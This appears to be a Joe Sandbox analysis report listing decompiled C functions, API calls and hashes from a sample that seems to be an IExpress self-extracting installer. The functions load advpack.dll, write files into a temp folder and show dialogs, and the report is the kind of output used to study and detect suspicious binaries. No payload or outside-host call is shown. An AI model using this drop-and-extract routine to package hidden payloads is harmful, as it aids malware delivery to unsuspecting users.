                                                          • String ID: 3$zhiga
                                                          • API String ID: 2519184315-2183486482
                                                          • Opcode ID: 8a050afa2ca82b738977f18320422bace9cd82c6fbc77c9da27cc63b850d8abb
                                                          • Instruction ID: 7aa3ee42c36db00fa5299bf131ceca7ba4e1bf4c81d3999db19d2965f24667ad
                                                          • Opcode Fuzzy Hash: 8a050afa2ca82b738977f18320422bace9cd82c6fbc77c9da27cc63b850d8abb
                                                          • Instruction Fuzzy Hash: D191B071E012259BEFB58A39C8A07EAB7E5FB45304F0540EAD9C9DF241D7398D80AF41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 83%
                                                          			E01096495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				void* __edi;
                                                          				signed int _t9;
                                                          				signed char _t14;
                                                          				struct HINSTANCE__* _t15;
                                                          				void* _t18;
                                                          				CHAR* _t26;
                                                          				void* _t27;
                                                          				signed int _t28;
                                                          
                                                          				_t27 = __esi;
                                                          				_t18 = __ebx;
                                                          				_t9 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t9 ^ _t28;
                                                          				_push(__ecx);
                                                          				E01091781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
                                                          				_t26 = "advpack.dll";
                                                          				E0109658A( &_v268, 0x104, _t26);
                                                          				_t14 = GetFileAttributesA( &_v268);
                                                          				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                          					_t15 = LoadLibraryA(_t26);
                                                          				} else {
                                                          					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                          				}
                                                          				return E01096CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                          			}














                                                          APIs
                                                          • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 010964DF
                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 010964F9
                                                          • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 01096502
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad$AttributesFile
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$advpack.dll
                                                          • API String ID: 438848745-1655358546
                                                          • Opcode ID: cefa56c9adaccc9a41143e91bfb494c7aab4cc14815ef16e40850e92783e975a
                                                          • Instruction ID: 4915394003c2ce906b7e31b5ae4b2573182bbb5646d716b663a39799acdc332e
                                                          • Opcode Fuzzy Hash: cefa56c9adaccc9a41143e91bfb494c7aab4cc14815ef16e40850e92783e975a
                                                          • Instruction Fuzzy Hash: 7801D170A00108ABDF60EB64DC69AEE7778EBA5310F400199F5C9931C4DF76AE86DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E010928E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                          				void* _v8;
                                                          				char* _v12;
                                                          				intOrPtr _v16;
                                                          				void* _v20;
                                                          				intOrPtr _v24;
                                                          				int _v28;
                                                          				int _v32;
                                                          				void* _v36;
                                                          				int _v40;
                                                          				void* _v44;
                                                          				intOrPtr _v48;
                                                          				intOrPtr _v52;
                                                          				intOrPtr _v56;
                                                          				intOrPtr _v60;
                                                          				intOrPtr _v64;
                                                          				long _t68;
                                                          				void* _t70;
                                                          				void* _t73;
                                                          				void* _t79;
                                                          				void* _t83;
                                                          				void* _t87;
                                                          				void* _t88;
                                                          				intOrPtr _t93;
                                                          				intOrPtr _t97;
                                                          				intOrPtr _t99;
                                                          				int _t101;
                                                          				void* _t103;
                                                          				void* _t106;
                                                          				void* _t109;
                                                          				void* _t110;
                                                          
                                                          				_v12 = __edx;
                                                          				_t99 = __ecx;
                                                          				_t106 = 0;
                                                          				_v16 = __ecx;
                                                          				_t87 = 0;
                                                          				_t103 = 0;
                                                          				_v20 = 0;
                                                          				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                          					L19:
                                                          					_t106 = 1;
                                                          				} else {
                                                          					_t62 = 0;
                                                          					_v8 = 0;
                                                          					while(1) {
                                                          						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                          						if(E01092773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                          							goto L20;
                                                          						}
                                                          						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                          						_v28 = _t68;
                                                          						if(_t68 == 0) {
                                                          							_t99 = _v16;
                                                          							_t70 = _v8 + _t99;
                                                          							_t93 = _v24;
                                                          							_t87 = _v20;
                                                          							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                          								goto L18;
                                                          							}
                                                          						} else {
                                                          							_t103 = GlobalAlloc(0x42, _t68);
                                                          							if(_t103 != 0) {
                                                          								_t73 = GlobalLock(_t103);
                                                          								_v36 = _t73;
                                                          								if(_t73 != 0) {
                                                          									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                          										L15:
                                                          										GlobalUnlock(_t103);
                                                          										_t99 = _v16;
                                                          										L18:
                                                          										_t87 = _t87 + 1;
                                                          										_t62 = _v8 + 0x3c;
                                                          										_v20 = _t87;
                                                          										_v8 = _v8 + 0x3c;
                                                          										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                          											continue;
                                                          										} else {
                                                          											goto L19;
                                                          										}
                                                          									} else {
                                                          										_t79 = _v44;
                                                          										_t88 = _t106;
                                                          										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                          										_t101 = _v28;
                                                          										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                          										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                          										_t97 = _v48;
                                                          										_v36 = _t83;
                                                          										_t109 = _t83;
                                                          										do {
                                                          											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E01092A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                          											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E01092A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                          											_t109 = _t109 + 0x18;
                                                          											_t88 = _t88 + 4;
                                                          										} while (_t88 < 8);
                                                          										_t87 = _v20;
                                                          										_t106 = 0;
                                                          										if(_v56 < 0 || _v64 > 0) {
                                                          											if(_v52 < _t106 || _v60 > _t106) {
                                                          												GlobalUnlock(_t103);
                                                          											} else {
                                                          												goto L15;
                                                          											}
                                                          										} else {
                                                          											goto L15;
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          						goto L20;
                                                          					}
                                                          				}
                                                          				L20:
                                                          				 *_a8 = _t87;
                                                          				if(_t103 != 0) {
                                                          					GlobalFree(_t103);
                                                          				}
                                                          				return _t106;
                                                          			}


































                                                          APIs
                                                          • GlobalFree.KERNEL32 ref: 01092A6F
                                                            • Part of subcall function 01092773: CharUpperA.USER32(08A9C601,00000000,00000000,00000000), ref: 010927A8
                                                            • Part of subcall function 01092773: CharNextA.USER32(0000054D), ref: 010927B5
                                                            • Part of subcall function 01092773: CharNextA.USER32(00000000), ref: 010927BC
                                                            • Part of subcall function 01092773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 01092829
                                                            • Part of subcall function 01092773: RegQueryValueExA.ADVAPI32(?,01091140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 01092852
                                                            • Part of subcall function 01092773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 01092870
                                                            • Part of subcall function 01092773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010928A0
                                                          • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,01093938,?,?,?,?,-00000005), ref: 01092958
                                                          • GlobalLock.KERNEL32 ref: 01092969
                                                          • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,01093938,?,?,?,?,-00000005,?), ref: 01092A21
                                                          • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 01092A81
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                          • String ID:
                                                          • API String ID: 3949799724-0
                                                          • Opcode ID: d0d4c63b149a0b39e050482643c47bb36a22b90d4cdad6eaed81504bb7595d50
                                                          • Instruction ID: ae66c218f94a43ef4e042bec08ad05320b38bef281496d4fe2e387080b24380e
                                                          • Opcode Fuzzy Hash: d0d4c63b149a0b39e050482643c47bb36a22b90d4cdad6eaed81504bb7595d50
                                                          • Instruction Fuzzy Hash: A0513B32E00219EFDF21DF98C894AAEFBB5FF48700F14416AE995E3211D7399941EB94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 32%
                                                          			E01094169(void* __eflags) {
                                                          				int _t18;
                                                          				void* _t21;
                                                          
                                                          				_t20 = E0109468F("FINISHMSG", 0, 0);
                                                          				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                          				if(_t21 != 0) {
                                                          					if(E0109468F("FINISHMSG", _t21, _t20) != 0) {
                                                          						if(lstrcmpA(_t21, "<None>") == 0) {
                                                          							L7:
                                                          							return LocalFree(_t21);
                                                          						}
                                                          						_push(0);
                                                          						_push(0x40);
                                                          						_push(0);
                                                          						_push(_t21);
                                                          						_t18 = 0x3e9;
                                                          						L6:
                                                          						E010944B9(0, _t18);
                                                          						goto L7;
                                                          					}
                                                          					_push(0);
                                                          					_push(0x10);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_t18 = 0x4b1;
                                                          					goto L6;
                                                          				}
                                                          				return E010944B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                          			}






                                                          APIs
                                                            • Part of subcall function 0109468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010946A0
                                                            • Part of subcall function 0109468F: SizeofResource.KERNEL32(00000000,00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946A9
                                                            • Part of subcall function 0109468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010946C3
                                                            • Part of subcall function 0109468F: LoadResource.KERNEL32(00000000,00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946CC
                                                            • Part of subcall function 0109468F: LockResource.KERNEL32(00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946D3
                                                            • Part of subcall function 0109468F: memcpy_s.MSVCRT ref: 010946E5
                                                            • Part of subcall function 0109468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010946EF
                                                          • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,010930B4), ref: 01094189
                                                          • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,010930B4), ref: 010941E7
                                                            • Part of subcall function 010944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01094518
                                                            • Part of subcall function 010944B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 01094554
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                          • String ID: <None>$FINISHMSG
                                                          • API String ID: 3507850446-3091758298
                                                          • Opcode ID: b2118df622176e7bb2734d2f58594d96cabb9043876947deece0b68ca8249b9e
                                                          • Instruction ID: 64b6b7643a5c420466d9e916c6691853ae3ca4f8b7c4326551c36a7542594f05
                                                          • Opcode Fuzzy Hash: b2118df622176e7bb2734d2f58594d96cabb9043876947deece0b68ca8249b9e
                                                          • Instruction Fuzzy Hash: AC0121F1300215BBFF2426698EB4FBB218EEBD8695F008025B7C1E2280DE68CC0221B4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E01097155() {
                                                          				void* _v8;
                                                          				struct _FILETIME _v16;
                                                          				signed int _v20;
                                                          				union _LARGE_INTEGER _v24;
                                                          				signed int _t23;
                                                          				signed int _t36;
                                                          				signed int _t37;
                                                          				signed int _t39;
                                                          
                                                          				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                          				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                          				_t23 =  *0x1098004; // 0x8a9c601
                                                          				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                          					GetSystemTimeAsFileTime( &_v16);
                                                          					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                          					_v8 = _v8 ^ GetCurrentProcessId();
                                                          					_v8 = _v8 ^ GetCurrentThreadId();
                                                          					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                          					QueryPerformanceCounter( &_v24);
                                                          					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                          					_t39 = _t36;
                                                          					if(_t36 == 0xbb40e64e || ( *0x1098004 & 0xffff0000) == 0) {
                                                          						_t36 = 0xbb40e64f;
                                                          						_t39 = 0xbb40e64f;
                                                          					}
                                                          					 *0x1098004 = _t39;
                                                          				}
                                                          				_t37 =  !_t36;
                                                          				 *0x1098008 = _t37;
                                                          				return _t37;
                                                          			}












                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 01097182
                                                          • GetCurrentProcessId.KERNEL32 ref: 01097191
                                                          • GetCurrentThreadId.KERNEL32 ref: 0109719A
                                                          • GetTickCount.KERNEL32 ref: 010971A3
                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 010971B8
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                          • String ID:
                                                          • API String ID: 1445889803-0
                                                          • Opcode ID: fb819c99be24f189c95223be8be839a8a9651e1fdb743c4f7016273605e2f422
                                                          • Instruction ID: 6f895dfef22aa0e1bfbd384ab8b1b3942168c944b06033ef5541a8fec32e3104
                                                          • Opcode Fuzzy Hash: fb819c99be24f189c95223be8be839a8a9651e1fdb743c4f7016273605e2f422
                                                          • Instruction Fuzzy Hash: B1113AB1E11208DBCF60DFB8D668A9EBBF5FF48314F614896E841E7204E6399A00DF40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 93%
                                                          			E010919E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                          				signed int _v8;
                                                          				char _v520;
                                                          				void* __esi;
                                                          				signed int _t11;
                                                          				void* _t14;
                                                          				void* _t23;
                                                          				void* _t27;
                                                          				void* _t33;
                                                          				struct HWND__* _t34;
                                                          				signed int _t35;
                                                          
                                                          				_t33 = __edi;
                                                          				_t27 = __ebx;
                                                          				_t11 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t11 ^ _t35;
                                                          				_t34 = _a4;
                                                          				_t14 = _a8 - 0x110;
                                                          				if(_t14 == 0) {
                                                          					_t32 = GetDesktopWindow();
                                                          					E010943D0(_t34, _t15);
                                                          					_v520 = 0;
                                                          					LoadStringA( *0x1099a3c, _a16,  &_v520, 0x200);
                                                          					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                          					MessageBeep(0xffffffff);
                                                          					goto L6;
                                                          				} else {
                                                          					if(_t14 != 1) {
                                                          						L4:
                                                          						_t23 = 0;
                                                          					} else {
                                                          						_t32 = _a12;
                                                          						if(_t32 - 0x83d > 1) {
                                                          							goto L4;
                                                          						} else {
                                                          							EndDialog(_t34, _t32);
                                                          							L6:
                                                          							_t23 = 1;
                                                          						}
                                                          					}
                                                          				}
                                                          				return E01096CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                          			}














                                                          APIs
                                                          • EndDialog.USER32(?,?), ref: 01091A18
                                                          • GetDesktopWindow.USER32 ref: 01091A24
                                                          • LoadStringA.USER32(?,?,00000200), ref: 01091A4F
                                                          • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 01091A62
                                                          • MessageBeep.USER32(000000FF), ref: 01091A6A
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                          • String ID:
                                                          • API String ID: 1273765764-0
                                                          • Opcode ID: 7b3ca437dbc5d029e836bc905fa66ab9e8dabe08cd8e9b28ae065d31e8698e91
                                                          • Instruction ID: 7ca9b3428ea5930eb7b95d4259c039ca03282a00c378498dea2ebb6de031594d
                                                          • Opcode Fuzzy Hash: 7b3ca437dbc5d029e836bc905fa66ab9e8dabe08cd8e9b28ae065d31e8698e91
                                                          • Instruction Fuzzy Hash: A511827170010AABDF20DF68D928AAE77F8FB49250F108155E9A293184DA399E01DB95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 88%
                                                          			E010963C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				long _v272;
                                                          				void* _v276;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t15;
                                                          				long _t28;
                                                          				struct _OVERLAPPED* _t37;
                                                          				void* _t39;
                                                          				signed int _t40;
                                                          
                                                          				_t15 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t15 ^ _t40;
                                                          				_v272 = _v272 & 0x00000000;
                                                          				_push(__ecx);
                                                          				_v276 = _a16;
                                                          				_t37 = 1;
                                                          				E01091781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
                                                          				E0109658A( &_v268, 0x104, _a12);
                                                          				_t28 = 0;
                                                          				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                          				if(_t39 != 0xffffffff) {
                                                          					_t28 = _a4;
                                                          					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                          						 *0x1099124 = 0x80070052;
                                                          						_t37 = 0;
                                                          					}
                                                          					CloseHandle(_t39);
                                                          				} else {
                                                          					 *0x1099124 = 0x80070052;
                                                          					_t37 = 0;
                                                          				}
                                                          				return E01096CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                          			}
















                                                          APIs
                                                          • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0109642D
                                                          • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0109645B
                                                          • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0109647A
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 010963EB
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleWrite
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                          • API String ID: 1065093856-2356899610
                                                          • Opcode ID: 06874f86ff77979dde7773ed48bca147aa5eb212db4294e83486cbe4182b1ace
                                                          • Instruction ID: 9ad6e0eec24bea500fdbf57f44e9689939fa5ee6b56b9bba19bfdf10c351dcad
                                                          • Opcode Fuzzy Hash: 06874f86ff77979dde7773ed48bca147aa5eb212db4294e83486cbe4182b1ace
                                                          • Instruction Fuzzy Hash: 9121D5B1A0021CABDB20DF65DC95FEB77B8FB89314F0041A9F5D5A3240DAB65D848F64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E010947E0(intOrPtr* __ecx) {
                                                          				intOrPtr _t6;
                                                          				intOrPtr _t9;
                                                          				void* _t11;
                                                          				void* _t19;
                                                          				intOrPtr* _t22;
                                                          				void _t24;
                                                          				struct HWND__* _t25;
                                                          				struct HWND__* _t26;
                                                          				void* _t27;
                                                          				intOrPtr* _t28;
                                                          				intOrPtr* _t33;
                                                          				void* _t34;
                                                          
                                                          				_t33 = __ecx;
                                                          				_t34 = LocalAlloc(0x40, 8);
                                                          				if(_t34 != 0) {
                                                          					_t22 = _t33;
                                                          					_t27 = _t22 + 1;
                                                          					do {
                                                          						_t6 =  *_t22;
                                                          						_t22 = _t22 + 1;
                                                          					} while (_t6 != 0);
                                                          					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                          					 *_t34 = _t24;
                                                          					if(_t24 != 0) {
                                                          						_t28 = _t33;
                                                          						_t19 = _t28 + 1;
                                                          						do {
                                                          							_t9 =  *_t28;
                                                          							_t28 = _t28 + 1;
                                                          						} while (_t9 != 0);
                                                          						E01091680(_t24, _t28 - _t19 + 1, _t33);
                                                          						_t11 =  *0x10991e0; // 0xd18308
                                                          						 *(_t34 + 4) = _t11;
                                                          						 *0x10991e0 = _t34;
                                                          						return 1;
                                                          					}
                                                          					_t25 =  *0x1098584; // 0x0
                                                          					E010944B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                          					LocalFree(_t34);
                                                          					L2:
                                                          					return 0;
                                                          				}
                                                          				_t26 =  *0x1098584; // 0x0
                                                          				E010944B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                          				goto L2;
                                                          			}
















                                                          APIs
                                                          • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,01094E6F), ref: 010947EA
                                                          • LocalAlloc.KERNEL32(00000040,?), ref: 01094823
                                                          • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 01094847
                                                            • Part of subcall function 010944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01094518
                                                            • Part of subcall function 010944B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 01094554
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 01094851
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Local$Alloc$FreeLoadMessageString
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                          • API String ID: 359063898-2356899610
                                                          • Opcode ID: d17749bbd7db96ed1dd3fb7e4b4ecc71443ff7e67e7072ca1874a6db9f0c03ef
                                                          • Instruction ID: f5f00e05f6176c833691178ec6b951f69ed076207d2e1eb14bd9a1e5f8632a63
                                                          • Opcode Fuzzy Hash: d17749bbd7db96ed1dd3fb7e4b4ecc71443ff7e67e7072ca1874a6db9f0c03ef
                                                          • Instruction Fuzzy Hash: 8C1106B5604641AFDF658E249938FBB3B9AFBC6340B048559F9C2CB345DA3A8807D760
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 77%
                                                          			E01096517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                          				struct HRSRC__* _t6;
                                                          				void* _t21;
                                                          				struct HINSTANCE__* _t23;
                                                          				int _t24;
                                                          
                                                          				_t23 =  *0x1099a3c; // 0x1090000
                                                          				_t6 = FindResourceA(_t23, __edx, 5);
                                                          				if(_t6 == 0) {
                                                          					L6:
                                                          					E010944B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                          					_t24 = _a16;
                                                          				} else {
                                                          					_t21 = LoadResource(_t23, _t6);
                                                          					if(_t21 == 0) {
                                                          						goto L6;
                                                          					} else {
                                                          						if(_a12 != 0) {
                                                          							_push(_a12);
                                                          						} else {
                                                          							_push(0);
                                                          						}
                                                          						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                          						FreeResource(_t21);
                                                          						if(_t24 == 0xffffffff) {
                                                          							goto L6;
                                                          						}
                                                          					}
                                                          				}
                                                          				return _t24;
                                                          			}








                                                          APIs
                                                          • FindResourceA.KERNEL32(01090000,000007D6,00000005), ref: 0109652A
                                                          • LoadResource.KERNEL32(01090000,00000000,?,?,01092EE8,00000000,010919E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 01096538
                                                          • DialogBoxIndirectParamA.USER32(01090000,00000000,00000547,010919E0,00000000), ref: 01096557
                                                          • FreeResource.KERNEL32(00000000,?,?,01092EE8,00000000,010919E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 01096560
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
